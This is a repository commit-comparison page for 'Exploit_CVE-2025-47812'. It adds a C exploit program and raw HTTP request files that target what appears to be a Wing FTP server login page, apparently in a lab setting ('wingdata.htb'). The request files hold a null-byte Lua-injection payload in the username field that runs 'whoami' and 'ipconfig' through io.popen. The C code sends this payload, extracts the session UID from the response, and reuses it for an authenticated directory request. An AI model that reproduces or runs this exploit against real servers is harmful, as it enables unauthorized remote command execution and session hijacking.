Master/Exploit_CVE-2025-47812
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Master/Exploit_CVE-2025-47812:f9ad642afb8c030b166a7a4731cb062538fd28e3
Branches Tags
Master/Exploit_CVE-2025-47812:main
...
compare: Master/Exploit_CVE-2025-47812:main
Branches Tags
Master/Exploit_CVE-2025-47812:main

10 Commits
f9ad642afb ... main

Author SHA1 Message Date
hexplor 2c0ce64926 add 2026-04-26 04:29:53 +02:00
hexplor 0ad306159e update rce working 2026-04-26 04:16:48 +02:00
hexplor 2ca0abe734 update 2026-04-26 04:10:02 +02:00
hexplor 904f9d9ddb update 2026-04-26 02:45:06 +02:00
hexplor 32bfca70b2 update 2026-04-26 02:30:32 +02:00
hexplor 361653d5e1 update 2026-04-26 00:41:52 +02:00
hexplor 6e89f36a5b update payload 2026-04-25 23:24:12 +02:00
hexplor ba426950ae updte 2026-04-25 23:14:49 +02:00
hexplor 194309a3bf upate 2026-04-25 22:22:27 +02:00
hexplor 8177d657a1 ajout de payload.txt 2026-04-25 02:21:13 +02:00
6 changed files with 292 additions and 41 deletions
Expand all files Collapse all files
.gitignore
+2
View File
@@ -0,0 +1,2 @@
exploit
exploit.o
Makefile
+2 -2
View File
@@ -1,7 +1,7 @@
EXEC = exploit
$(EXEC): exploit.o
gcc -o $(EXEC) exploit.o
gcc -g -o $(EXEC) exploit.o
exploit.o: exploit.c
gcc -c exploit.c
gcc -g -c exploit.c
SAVE_request_rce.txt
+23
View File
@@ -0,0 +1,23 @@
POST /loginok.html HTTP/1.1
Host: localhost
Content-Length: 65
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/login.html?lang=french
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french
Connection: keep-alive
username=anonymous%00]]%0dlocal+h+%3d+io.popen("whoami")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=&username_val=anonymous&password_val=
exploit.c
+225 -39
View File
@@ -3,47 +3,233 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
int main(int argc, char** argv){
if (argc != 2){
printf("u must specifie IP addr\n");
exit(1);
}
printf("target = %s\n", argv[1]);
int domain = AF_INET;
int type = SOCK_STREAM;
int fd = socket(domain, type, 0);
printf("fd = %d\n", fd);
void envoie_request(void);
void recevoir_request(void);
void recup_uid(void);
struct sockaddr_in dest_addr;
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
dest_addr.sin_addr.s_addr = inet_addr(argv[1]);
int creer_et_connecter_socket(const char* ip_addr) {
int domain = AF_INET;
int type = SOCK_STREAM;
int fd = socket(domain, type, 0);
if (fd < 0) {
printf("Erreur création socket\n");
return -1;
}
printf("fd = %d\n", fd);
struct sockaddr_in dest_addr;
memset(&dest_addr, 0, sizeof(dest_addr));
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(80);
dest_addr.sin_addr.s_addr = inet_addr(ip_addr);
int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr));
printf("ret_connect = %d\n", ret);
char buffer[100];
memset(buffer, 0, 100);
strncpy(buffer, "GET /login.html HTTP/1.1\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
strncpy(buffer, "Host: ftp.wingdata.htb\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
strncpy(buffer, "Accept: */*\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
strncpy(buffer, "\r\n", 100);
send(fd, buffer, strlen(buffer), 0);
int n;
while (( n = recv(fd, buffer, 99, 0)) > 0){
buffer[n] = 0;
printf("%s", buffer);
}
return 0;
int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr));
if (ret < 0) {
printf("Erreur connexion\n");
close(fd);
return -1;
}
printf("ret_connect = %d\n", ret);
return fd;
}
void envoyer_requete(int fd, const char* fichier_requete) {
FILE* fichier_out = fopen(fichier_requete, "r");
if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
return;
}
fseek(fichier_out, 0, SEEK_END);
long size = ftell(fichier_out);
char* file_buffer = malloc(size + 1);
fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
file_buffer[size] = '\0';
printf("\n--- Envoi requête depuis %s ---\n", fichier_requete);
for (int i = 0; i < size; i++) {
char c = file_buffer[i];
if (c == '\n')
send(fd, "\r\n", 2, 0);
else
send(fd, &c, 1, 0);
}
send(fd, "\r\n", 2, 0);
free(file_buffer);
fclose(fichier_out);
}
void recevoir_reponse(int fd, char** reponse, int* taille) {
char c = 0;
int n = 0;
char* text = calloc(1, 1);
int len = 0;
printf("\n--- Réponse reçue ---\n");
struct timeval tv;
tv.tv_sec = 5;
tv.tv_usec = 0;
setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
while ((n = recv(fd, &c, 1, 0)) > 0) {
printf("%c", c);
len = strlen(text) + 2;
text = realloc(text, len);
text[len - 2] = c;
text[len - 1] = 0;
}
printf("\n--- Fin réponse ---\n");
*reponse = text;
*taille = len;
}
char* extraire_uid(const char* reponse) {
int index = 0;
char* uid = malloc(400);
memset(uid, 0, 400);
while (reponse[index]) {
if (reponse[index] == 'U') {
if (strncmp(reponse + index, "UID=", 4) == 0) {
printf("\nPattern UID= trouvé\n");
index += 4;
int j = 0;
while (reponse[index] && reponse[index] != ';' &&
reponse[index] != '\r' && reponse[index] != '\n') {
uid[j] = reponse[index];
j++;
index++;
}
uid[j] = 0;
break;
}
}
index++;
}
if (strlen(uid) == 0) {
printf("UID non trouvé dans la réponse\n");
free(uid);
return NULL;
}
printf("UID extrait = %s\n", uid);
return uid;
}
void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) {
FILE* fichier_out = fopen(fichier_requete, "r");
if (!fichier_out) {
printf("Erreur ouverture fichier: %s\n", fichier_requete);
return;
}
fseek(fichier_out, 0, SEEK_END);
long size = ftell(fichier_out);
char* file_buffer = malloc(size + 1);
fseek(fichier_out, 0, SEEK_SET);
fread(file_buffer, 1, size, fichier_out);
file_buffer[size] = '\0';
printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid);
for (int i = 0; i < size; i++) {
char c = file_buffer[i];
printf("%c", c);
if (c == 'U') {
if (strncmp(file_buffer + i, "UID=", 4) == 0) {
send(fd, file_buffer + i, 4, 0);
send(fd, uid, strlen(uid), 0);
send(fd, "\r\n", 2, 0);
printf("ID=%s", uid);
i += 3;
continue;
}
}
else if (c == '\n') {
send(fd, "\r\n", 2, 0);
}
else {
send(fd, &c, 1, 0);
}
}
send(fd, "\r\n\r\n", 4, 0);
free(file_buffer);
fclose(fichier_out);
}
int main(int argc, char** argv) {
if (argc != 2) {
printf("Tu dois spécifier l'adresse IP\n");
exit(1);
}
printf("target = %s\n", argv[1]);
printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n");
int fd = creer_et_connecter_socket(argv[1]);
if (fd < 0) {
exit(1);
}
envoyer_requete(fd, "request_rce.txt");
char* reponse1 = NULL;
int taille1 = 0;
recevoir_reponse(fd, &reponse1, &taille1);
char* uid = extraire_uid(reponse1);
close(fd);
if (!uid) {
printf("Impossible d'extraire l'UID, arrêt du programme\n");
free(reponse1);
exit(1);
}
printf("\nUID récupéré avec succès: [%s]\n", uid);
printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n");
int fd2 = creer_et_connecter_socket(argv[1]);
if (fd2 < 0) {
free(uid);
free(reponse1);
exit(1);
}
envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid);
char* reponse2 = NULL;
int taille2 = 0;
recevoir_reponse(fd2, &reponse2, &taille2);
if (reponse2 && strlen(reponse2) > 0) {
printf("\n--- RÉPONSE DIR COMPLÈTE ---\n");
printf("%s\n", reponse2);
} else {
printf("\nAucune réponse reçue pour la requête DIR\n");
}
close(fd2);
free(uid);
free(reponse1);
free(reponse2);
return 0;
}
request_dir_with_token.txt
+17
View File
@@ -0,0 +1,17 @@
POST /dir.html HTTP/1.1
Host: localhost
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
Content-Type: application/x-www-form-urlencoded
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/main.html
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french; viewmode=0; UID=
Connection: keep-alive
request_rce.txt
+23
View File
@@ -0,0 +1,23 @@
POST /loginok.html HTTP/1.1
Host: localhost
Content-Length: 65
Cache-Control: max-age=0
sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: fr-FR,fr;q=0.9
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/login.html?lang=french
Accept-Encoding: gzip, deflate, br
Cookie: client_lang=french
Connection: keep-alive
username=anonymous%00]]%0dlocal+h+%3d+io.popen("ipconfig")%0dlocal+r+%3d+h%3aread("*a")%0dh%3aclose()%0dprint(r)%0d--&password=&username_val=anonymous&password_val=